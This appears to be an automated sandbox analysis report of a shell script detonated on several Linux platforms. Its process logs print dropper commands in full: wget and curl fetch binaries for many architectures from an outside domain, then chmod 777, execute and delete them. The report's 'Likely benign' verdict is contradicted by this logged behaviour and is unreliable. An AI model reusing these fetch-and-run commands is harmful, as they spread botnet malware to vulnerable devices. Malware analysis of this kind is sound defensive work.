Analysis Overview
SHA256
072a6dc8a7e9fb53b59013d0f1acd7e0f400e5ef77f264a7d4f85be4fde125c7
Threat Level: Likely benign
The file 69f4dcd1de05fc553781e737e85bdae5f0e79e7f34ded1899d60630e54d43fe4.zip was found to be: Likely benign.
Malicious Activity Summary
Checks CPU configuration
Reads runtime system information
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-07-15 19:21
Signatures
Analysis: behavioral4
Detonation Overview
Submitted
2024-07-15 19:21
Reported
2024-07-15 19:22
Platform
debian9-mipsel-20240418-en
Max time kernel
28s
Max time network
30s
Command Line
Signatures
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/filesystems | /bin/cp | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/busybox | /bin/cp | N/A |
Processes
/tmp/69f4dcd1de05fc553781e737e85bdae5f0e79e7f34ded1899d60630e54d43fe4.sh
[/tmp/69f4dcd1de05fc553781e737e85bdae5f0e79e7f34ded1899d60630e54d43fe4.sh]
/bin/cp
[cp /bin/busybox /tmp/]
/usr/bin/wget
[wget http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.i486]
/usr/bin/curl
[curl -O http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.i486]
/bin/chmod
[chmod 777 daddyl33tpiss.i486]
/tmp/daddyl33tpiss.i486
[./daddyl33tpiss.i486 Retard.i486.wget]
/bin/rm
[rm -rf daddyl33tpiss.i486]
/usr/bin/wget
[wget http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.x86_64]
/usr/bin/curl
[curl -O http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.x86_64]
/bin/chmod
[chmod 777 daddyl33tpiss.x86_64]
/tmp/daddyl33tpiss.x86_64
[./daddyl33tpiss.x86_64 Retard.x86_64.wget]
/bin/rm
[rm -rf daddyl33tpiss.x86_64]
/usr/bin/wget
[wget http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.i586]
/usr/bin/curl
[curl -O http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.i586]
/bin/chmod
[chmod 777 daddyl33tpiss.i586]
/tmp/daddyl33tpiss.i586
[./daddyl33tpiss.i586 Retard.i586.wget]
/bin/rm
[rm -rf daddyl33tpiss.i586]
/usr/bin/wget
[wget http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.i686]
/usr/bin/curl
[curl -O http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.i686]
/bin/chmod
[chmod 777 daddyl33tpiss.i686]
/tmp/daddyl33tpiss.i686
[./daddyl33tpiss.i686 Retard.i686.wget]
/bin/rm
[rm -rf daddyl33tpiss.i686]
/usr/bin/wget
[wget http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.mips]
/usr/bin/curl
[curl -O http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.mips]
/bin/chmod
[chmod 777 daddyl33tpiss.mips]
/tmp/daddyl33tpiss.mips
[./daddyl33tpiss.mips Retard.mips.wget]
/bin/rm
[rm -rf daddyl33tpiss.mips]
/usr/bin/wget
[wget http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.mipsel]
/usr/bin/curl
[curl -O http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.mipsel]
/bin/chmod
[chmod 777 daddyl33tpiss.mipsel]
/tmp/daddyl33tpiss.mipsel
[./daddyl33tpiss.mipsel Retard.mipsel.wget]
/bin/rm
[rm -rf daddyl33tpiss.mipsel]
/usr/bin/wget
[wget http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.arm]
/usr/bin/curl
[curl -O http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.arm]
/bin/chmod
[chmod 777 daddyl33tpiss.arm]
/tmp/daddyl33tpiss.arm
[./daddyl33tpiss.arm Retard.arm.wget]
/bin/rm
[rm -rf daddyl33tpiss.arm]
/usr/bin/wget
[wget http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.arm5]
/usr/bin/curl
[curl -O http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.arm5]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | aggressivepvp.cf | udp |
Files
/tmp/busybox
| MD5 | 6ffc46165b5d9726a6607f3ea5305589 |
| SHA1 | ab127220f42e816b413dde0d17031e251a7bc98f |
| SHA256 | 80d636e2f1237e9adc9ea0bf7f42b17d7df8781db0684c33696411e50588a38c |
| SHA512 | 456fcd5d5bda524ef5236e00695a891cfefe15364f9c7a4ff04ad7dfdc7fd1726f037e905622216f13aee6c2d4ee90be0c850de82b3aac1d02a643db9f935af8 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-15 19:21
Reported
2024-07-15 19:21
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
10s
Max time network
13s
Command Line
Signatures
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/filesystems | /bin/cp | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/busybox | /bin/cp | N/A |
Processes
/tmp/69f4dcd1de05fc553781e737e85bdae5f0e79e7f34ded1899d60630e54d43fe4.sh
[/tmp/69f4dcd1de05fc553781e737e85bdae5f0e79e7f34ded1899d60630e54d43fe4.sh]
/bin/cp
[cp /bin/busybox /tmp/]
/usr/bin/wget
[wget http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.i486]
/usr/bin/curl
[curl -O http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.i486]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | | udp |
| US | 1.1.1.1:53 | aggressivepvp.cf | udp |
| GB | 185.125.188.62:443 | | tcp |
| US | 151.101.1.91:443 | | tcp |
| GB | 195.181.164.15:443 | | tcp |
Files
/tmp/busybox
| MD5 | b4dede5fc0b1bad5cb8e901bde126b97 |
| SHA1 | 10cbe9a418ad84a1ed297948539d37aeb58dd810 |
| SHA256 | a9f0735d28f9a6a4f2634d3b144156f7b3df3b476a16a5ab0c7bdf98d74dd020 |
| SHA512 | 45665ce3a42f63a01fdef517e0c4cb943efce64c8a32d3ce07ab4f1fafc23cda77f378d324342efc79dc9d2293c4b4454d06c1cf4997b9e866784de01cb546e6 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-07-15 19:21
Reported
2024-07-15 19:21
Platform
debian9-armhf-20240418-en
Max time kernel
18s
Max time network
3s
Command Line
Signatures
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/filesystems | /bin/cp | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/busybox | /bin/cp | N/A |
Processes
/tmp/69f4dcd1de05fc553781e737e85bdae5f0e79e7f34ded1899d60630e54d43fe4.sh
[/tmp/69f4dcd1de05fc553781e737e85bdae5f0e79e7f34ded1899d60630e54d43fe4.sh]
/bin/cp
[cp /bin/busybox /tmp/]
/usr/bin/wget
[wget http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.i486]
/usr/bin/curl
[curl -O http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.i486]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | aggressivepvp.cf | udp |
Files
/tmp/busybox
| MD5 | e588bcf03ae78237b58899d35f50c570 |
| SHA1 | 2194732ebbefbc27bdae876c77f2a97a20175710 |
| SHA256 | 2dd1fbb8052a89f40c2e9af115d31346e554ee746e9c7a97d651e43e0609df88 |
| SHA512 | 904d906ec73ba5f828ee453acfceaf60d07b337a4baf1a88a2edba8d4568e4a3ceae2e24116af0a5b9c8ad194faa72abb62a72d30ae236b0852827c7bf896555 |
Analysis: behavioral3
Detonation Overview
Submitted
2024-07-15 19:21
Reported
2024-07-15 19:22
Platform
debian9-mipsbe-20240611-en
Max time kernel
24s
Max time network
26s
Command Line
Signatures
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/filesystems | /bin/cp | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/busybox | /bin/cp | N/A |
Processes
/tmp/69f4dcd1de05fc553781e737e85bdae5f0e79e7f34ded1899d60630e54d43fe4.sh
[/tmp/69f4dcd1de05fc553781e737e85bdae5f0e79e7f34ded1899d60630e54d43fe4.sh]
/bin/cp
[cp /bin/busybox /tmp/]
/usr/bin/wget
[wget http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.i486]
/usr/bin/curl
[curl -O http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.i486]
/bin/chmod
[chmod 777 daddyl33tpiss.i486]
/tmp/daddyl33tpiss.i486
[./daddyl33tpiss.i486 Retard.i486.wget]
/bin/rm
[rm -rf daddyl33tpiss.i486]
/usr/bin/wget
[wget http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.x86_64]
/usr/bin/curl
[curl -O http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.x86_64]
/bin/chmod
[chmod 777 daddyl33tpiss.x86_64]
/tmp/daddyl33tpiss.x86_64
[./daddyl33tpiss.x86_64 Retard.x86_64.wget]
/bin/rm
[rm -rf daddyl33tpiss.x86_64]
/usr/bin/wget
[wget http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.i586]
/usr/bin/curl
[curl -O http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.i586]
/bin/chmod
[chmod 777 daddyl33tpiss.i586]
/tmp/daddyl33tpiss.i586
[./daddyl33tpiss.i586 Retard.i586.wget]
/bin/rm
[rm -rf daddyl33tpiss.i586]
/usr/bin/wget
[wget http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.i686]
/usr/bin/curl
[curl -O http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.i686]
/bin/chmod
[chmod 777 daddyl33tpiss.i686]
/tmp/daddyl33tpiss.i686
[./daddyl33tpiss.i686 Retard.i686.wget]
/bin/rm
[rm -rf daddyl33tpiss.i686]
/usr/bin/wget
[wget http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.mips]
/usr/bin/curl
[curl -O http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.mips]
/bin/chmod
[chmod 777 daddyl33tpiss.mips]
/tmp/daddyl33tpiss.mips
[./daddyl33tpiss.mips Retard.mips.wget]
/bin/rm
[rm -rf daddyl33tpiss.mips]
/usr/bin/wget
[wget http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.mipsel]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | aggressivepvp.cf | udp |
Files
/tmp/busybox
| MD5 | a39fe8036e559ce804e26518061e59ff |
| SHA1 | 8df27f6e8a48b762d945ea2f2b87390c80acd4de |
| SHA256 | 3180df117342646dcdc4c436f95b41e15587e2238ec59064b4b06c065d56cf38 |
| SHA512 | e97756f316fceef7360e789362648529eea50eb6f7cc56cf654b3fc43ca61f0e4d9f366ed8fd59b73dd5a49615e935e9f53686d15f9a83c7fa472a70e7196d0d |